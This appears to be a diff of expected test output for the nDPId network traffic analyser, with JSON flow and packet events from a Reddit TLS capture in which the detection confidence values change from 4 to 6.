+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686071,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686071,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686072,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/KfiS\/LFklWsoBJXgCIUAAACBAV4AQMDAwQCCArC1ziqqXTl5w=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686072,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVayn4kvzgBAB+6YAAAABAQgKqXTmDMLXOKo="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686035,"flow_last_seen":1605291686072,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686072,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -82,9 +82,9 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 
@@ -93,58 +93,58 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
